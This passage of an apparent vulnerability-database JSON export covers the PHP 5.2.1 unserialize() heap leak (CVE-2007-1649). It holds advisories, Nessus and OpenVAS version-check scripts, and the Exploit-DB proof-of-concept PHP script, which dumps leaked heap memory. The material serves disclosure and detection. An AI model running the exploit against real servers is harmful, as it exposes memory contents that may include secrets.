value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_is_less( version:vers, test_version:\"5.2.2\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"5.2.2\" );\n security_message( data:report, port:port );\n exit( 0 );\n}\n\nexit( 99 );", "naslFamily": "Web application abuses", "pluginID": "1361412562310110185"}
{"cve": [{"lastseen": "2017-07-29T11:21:56", "bulletinFamily": "NVD", "description": "PHP 5.2.1 allows context-dependent attackers to read portions of heap memory by executing certain scripts with a serialized data input string beginning with S:, which does not properly track the number of input bytes being processed.", "modified": "2017-07-28T21:30:53", "published": "2007-03-23T20:19:00", "id": "CVE-2007-1649", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1649", "title": "CVE-2007-1649", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-01-31T18:46:35", "bulletinFamily": "exploit", "description": "PHP 5.2.1 unserialize() Local Information Leak Exploit. CVE-2007-1649. Local exploits for multiple platform", "modified": "2007-03-23T00:00:00", "published": "2007-03-23T00:00:00", "id": "EDB-ID:3559", "href": "https://www.exploit-db.com/exploits/3559/", "type": "exploitdb", "title": "PHP 5.2.1 unserialize Local Information Leak Exploit", "sourceData": "<?php\n ////////////////////////////////////////////////////////////////////////\n // _ _ _ _ ___ _ _ ___ //\n // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \\| || || _ \\ //\n // | __ |/ _` || '_|/ _` |/ -_)| ' \\ / -_)/ _` ||___|| _/| __ || _/ //\n // |_||_|\\__,_||_| \\__,_|\\___||_||_|\\___|\\__,_| |_| |_||_||_| //\n // //\n // Proof of concept code from the Hardened-PHP Project //\n // (C) Copyright 2007 Stefan Esser //\n // //\n ////////////////////////////////////////////////////////////////////////\n // PHP 5.2.1 unserialize() Information Leak Vulnerability //\n ////////////////////////////////////////////////////////////////////////\n\n // This is meant as a protection against remote file inclusion.\n die(\"REMOVE THIS LINE\");\n \n \n \n \n $str = 'S:'.(100*3).':\"'.str_repeat('\\61', 100).'\"';\n $arr = array(str_repeat('\"', 200).\"1\"=>1,str_repeat('\"', 200).\"2\"=>1);\n\n $heapdump = unserialize($str);\n \n \n \n \n echo \"Heapdump\\n---------\\n\\n\";\n \n $len = strlen($heapdump);\n for ($b=0; $b<$len; $b+=16) {\n printf(\"%08x: \", $b);\n for ($i=0; $i<16; $i++) {\n if ($b+$i<$len) {\n printf (\"%02x \", ord($heapdump[$b+$i]));\n } else {\n printf (\".. \");\n }\n }\n for ($i=0; $i<16; $i++) {\n if ($b+$i<$len) {\n $c = ord($heapdump[$b+$i]);\n } else {\n $c = 0;\n }\n if ($c > 127 || $c < 32) {\n $c = ord(\".\");\n }\n printf (\"%c\", $c);\n }\n printf(\"\\n\");\n }\n?>\n\n# milw0rm.com [2007-03-23]\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/3559/"}], "nessus": [{"lastseen": "2019-02-21T01:08:30", "bulletinFamily": "scanner", "description": "According to its banner, the version of PHP 5.x installed on the remote host is older than 5.2.2. An attacker may read some heap memory by processing 'S:' serialized data.", "modified": "2018-07-24T00:00:00", "id": "PHP_5_2_2.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=17797", "published": "2012-01-11T00:00:00", "title": "PHP 5.x < 5.2.2 Information Disclosure", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17797);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\"CVE-2007-1649\");\n script_bugtraq_id(23105);\n\n script_name(english:\"PHP 5.x < 5.2.2 Information Disclosure\");\n script_summary(english:\"Checks version of PHP\");\n \n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server uses a version of PHP that is affected by an\ninformation disclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its banner, the version of PHP 5.x installed on the\nremote host is older than 5.2.2. An attacker may read some heap\nmemory by processing 'S:' serialized data.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/releases/5_2_2.php\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to PHP version 5.2.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/03/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\nif (version !~ \"^5\\.\") exit(0, \"The web server on port \"+port+\" uses PHP \"+version+\" rather than 5.x.\");\n\nif (version =~ \"^5\\.([01]\\..*|2\\.[01])($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version+\n '\\n Fixed version : 5.2.2\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:11:47", "bulletinFamily": "scanner", "description": "A number of vulnerabilities have been found and corrected in PHP :\n\nPHP 5.2.1 would allow context-dependent attackers to read portions of heap memory by executing certain scripts with a serialized data input string beginning with 'S:', which did not properly track the number of input bytes being processed (CVE-2007-1649).\n\nA vulnerability in the chunk_split() function in PHP prior to 5.2.4 has unknown impact and attack vectors, related to an incorrect size calculation (CVE-2007-4660).\n\nThe htmlentities() and htmlspecialchars() functions in PHP prior to 5.2.5 accepted partial multibyte sequences, which has unknown impact and attack vectors (CVE-2007-5898).\n\nThe output_add_rewrite_var() function in PHP prior to 5.2.5 rewrites local forms in which the ACTION attribute references a non-local URL, which could allow a remote attacker to obtain potentially sensitive information by reading the requests for this URL (CVE-2007-5899).\n\nThe escapeshellcmd() API function in PHP prior to 5.2.6 has unknown impact and context-dependent attack vectors related to incomplete multibyte characters (CVE-2008-2051).\n\nWeaknesses in the GENERATE_SEED macro in PHP prior to 4.4.8 and 5.2.5 were discovered that could produce a zero seed in rare circumstances on 32bit systems and generations a portion of zero bits during conversion due to insufficient precision on 64bit systems (CVE-2008-2107, CVE-2008-2108).\n\nThe IMAP module in PHP uses obsolete API calls that allow context-dependent attackers to cause a denial of service (crash) via a long IMAP request (CVE-2008-2829).\n\nThe updated packages have been patched to correct these issues.", "modified": "2018-07-19T00:00:00", "id": "MANDRIVA_MDVSA-2008-126.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=37584", "published": "2009-04-23T00:00:00", "title": "Mandriva Linux Security Advisory : php (MDVSA-2008:126)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2008:126. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(37584);\n script_version (\"1.20\");\n script_cvs_date(\"Date: 2018/07/19 20:59:15\");\n\n script_cve_id(\n \"CVE-2007-1649\",\n \"CVE-2007-4660\",\n \"CVE-2007-5898\",\n \"CVE-2007-5899\",\n \"CVE-2008-2051\",\n \"CVE-2008-2107\",\n \"CVE-2008-2108\",\n \"CVE-2008-2829\"\n );\n script_bugtraq_id(\n 23105,\n 25498,\n 26403,\n 29829\n );\n script_xref(name:\"MDVSA\", value:\"2008:126\");\n\n script_name(english:\"Mandriva Linux Security Advisory : php (MDVSA-2008:126)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A number of vulnerabilities have been found and corrected in PHP :\n\nPHP 5.2.1 would allow context-dependent attackers to read portions of\nheap memory by executing certain scripts with a serialized data input\nstring beginning with 'S:', which did not properly track the number of\ninput bytes being processed (CVE-2007-1649).\n\nA vulnerability in the chunk_split() function in PHP prior to 5.2.4\nhas unknown impact and attack vectors, related to an incorrect size\ncalculation (CVE-2007-4660).\n\nThe htmlentities() and htmlspecialchars() functions in PHP prior to\n5.2.5 accepted partial multibyte sequences, which has unknown impact\nand attack vectors (CVE-2007-5898).\n\nThe output_add_rewrite_var() function in PHP prior to 5.2.5 rewrites\nlocal forms in which the ACTION attribute references a non-local URL,\nwhich could allow a remote attacker to obtain potentially sensitive\ninformation by reading the requests for this URL (CVE-2007-5899).\n\nThe escapeshellcmd() API function in PHP prior to 5.2.6 has unknown\nimpact and context-dependent attack vectors related to incomplete\nmultibyte characters (CVE-2008-2051).\n\nWeaknesses in the GENERATE_SEED macro in PHP prior to 4.4.8 and 5.2.5\nwere discovered that could produce a zero seed in rare circumstances\non 32bit systems and generations a portion of zero bits during\nconversion due to insufficient precision on 64bit systems\n(CVE-2008-2107, CVE-2008-2108).\n\nThe IMAP module in PHP uses obsolete API calls that allow\ncontext-dependent attackers to cause a denial of service (crash) via a\nlong IMAP request (CVE-2008-2829).\n\nThe updated packages have been patched to correct these issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 189, 200, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.2.1-4.4mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libphp5_common5-5.2.1-4.4mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-cgi-5.2.1-4.4mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-cli-5.2.1-4.4mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-devel-5.2.1-4.4mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-fcgi-5.2.1-4.4mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-imap-5.2.1-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-openssl-5.2.1-4.4mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-zlib-5.2.1-4.4mdv2007.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Solution Description\nUpgrade to version 5.2.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://us2.php.net/releases/5_2_2.php\n[Secunia Advisory ID:24630](https://secuniaresearch.flexerasoftware.com/advisories/24630/)\nOther Advisory URL: http://www.php-security.org/MOPB/MOPB-29-2007.html\nISS X-Force ID: 33170\n[CVE-2007-1649](https://vulners.com/cve/CVE-2007-1649)\nBugtraq ID: 23105\n", "modified": "2007-03-23T07:49:25", "published": "2007-03-23T07:49:25", "href": "https://vulners.com/osvdb/OSVDB:33943", "id": "OSVDB:33943", "title": "PHP unserialize() S: Data Type Arbitrary Memory Disclosure", "type": "osvdb", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "description": "Uninitiailized memory fragment is returned on "S:" string.", "modified": "2007-03-25T00:00:00", "published": "2007-03-25T00:00:00", "id": "SECURITYVULNS:VULN:7472", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7472", "title": "PHP unserialize() function information leak", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2018-04-09T11:41:27", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2018-04-06T00:00:00", "published": "2009-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830416", "id": "OPENVAS:1361412562310830416", "type": "openvas", "title": "Mandriva Update for php MDVSA-2008:126 (php)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for php MDVSA-2008:126 (php)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A number of vulnerabilities have been found and corrected in PHP:\n\n PHP 5.2.1 would allow context-dependent attackers to read portions\n of heap memory by executing certain scripts with a serialized data\n input string beginning with 'S:', which did not properly track the\n number of input bytes being processed (CVE-2007-1649).\n \n A vulnerability in the chunk_split() function in PHP prior to 5.2.4\n has unknown impact and attack vectors, related to an incorrect size\n calculation (CVE-2007-4660).\n \n The htmlentities() and htmlspecialchars() functions in PHP prior to\n 5.2.5 accepted partial multibyte sequences, which has unknown impact\n and attack vectors (CVE-2007-5898).\n \n The output_add_rewrite_var() function in PHP prior to 5.2.5 rewrites\n local forms in which the ACTION attribute references a non-local URL,\n which could allow a remote attacker to obtain potentially sensitive\n information by reading the requests for this URL (CVE-2007-5899).\n \n The escapeshellcmd() API function in PHP prior to 5.2.6 has unknown\n impact and context-dependent attack vectors related to incomplete\n multibyte characters (CVE-2008-2051).\n \n Weaknesses in the GENERATE_SEED macro in PHP prior to 4.4.8 and 5.2.5\n were discovered that could produce a zero seed in rare circumstances on\n 32bit systems and generations a portion of zero bits during conversion\n due to insufficient precision on 64bit systems (CVE-2008-2107,\n CVE-2008-2108).\n \n The IMAP module in PHP uses obsolete API calls that allow\n context-dependent attackers to cause a denial of service (crash)\n via a long IMAP request (CVE-2008-2829).\n \n The updated packages have been patched to correct these issues.\";\n\ntag_affected = \"php on Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2008-07/msg00004.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830416\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:26:37 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2008:126\");\n script_cve_id(\"CVE-2007-1649\", \"CVE-2007-4660\", \"CVE-2007-5898\", \"CVE-2007-5899\", \"CVE-2008-2051\", \"CVE-2008-2107\", \"CVE-2008-2108\", \"CVE-2008-2829\");\n script_name( \"Mandriva Update for php MDVSA-2008:126 (php)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.2.1~4.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.2.1~4.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.2.1~4.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.2.1~4.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.2.1~4.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.2.1~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.2.1~4.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.2.1~4.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.2.1~4.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.2.1~4.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:07", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2017-07-06T00:00:00", "published": "2009-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=830416", "id": "OPENVAS:830416", "title": "Mandriva Update for php MDVSA-2008:126 (php)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for php MDVSA-2008:126 (php)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A number of vulnerabilities have been found and corrected in PHP:\n\n PHP 5.2.1 would allow context-dependent attackers to read portions\n of heap memory by executing certain scripts with a serialized data\n input string beginning with 'S:', which did not properly track the\n number of input bytes being processed (CVE-2007-1649).\n \n A vulnerability in the chunk_split() function in PHP prior to 5.2.4\n has unknown impact and attack vectors, related to an incorrect size\n calculation (CVE-2007-4660).\n \n The htmlentities() and htmlspecialchars() functions in PHP prior to\n 5.2.5 accepted partial multibyte sequences, which has unknown impact\n and attack vectors (CVE-2007-5898).\n \n The output_add_rewrite_var() function in PHP prior to 5.2.5 rewrites\n local forms in which the ACTION attribute references a non-local URL,\n which could allow a remote attacker to obtain potentially sensitive\n information by reading the requests for this URL (CVE-2007-5899).\n \n The escapeshellcmd() API function in PHP prior to 5.2.6 has unknown\n impact and context-dependent attack vectors related to incomplete\n multibyte characters (CVE-2008-2051).\n \n Weaknesses in the GENERATE_SEED macro in PHP prior to 4.4.8 and 5.2.5\n were discovered that could produce a zero seed in rare circumstances on\n 32bit systems and generations a portion of zero bits during conversion\n due to insufficient precision on 64bit systems (CVE-2008-2107,\n CVE-2008-2108).\n \n The IMAP module in PHP uses obsolete API calls that allow\n context-dependent attackers to cause a denial of service (crash)\n via a long IMAP request (CVE-2008-2829).\n \n The updated packages have been patched to correct these issues.\";\n\ntag_affected = \"php on Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2008-07/msg00004.php\");\n script_id(830416);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:26:37 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2008:126\");\n script_cve_id(\"CVE-2007-1649\", \"CVE-2007-4660\", \"CVE-2007-5898\", \"CVE-2007-5899\", \"CVE-2008-2051\", \"CVE-2008-2107\", \"CVE-2008-2108\", \"CVE-2008-2829\");\n script_name( \"Mandriva Update for php MDVSA-2008:126 (php)\");\n\n script_summary(\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.2.1~4.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.2.1~4.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.2.1~4.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.2.1~4.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.2.1~4.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.2.1~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.2.1~4.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.2.1~4.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php\", 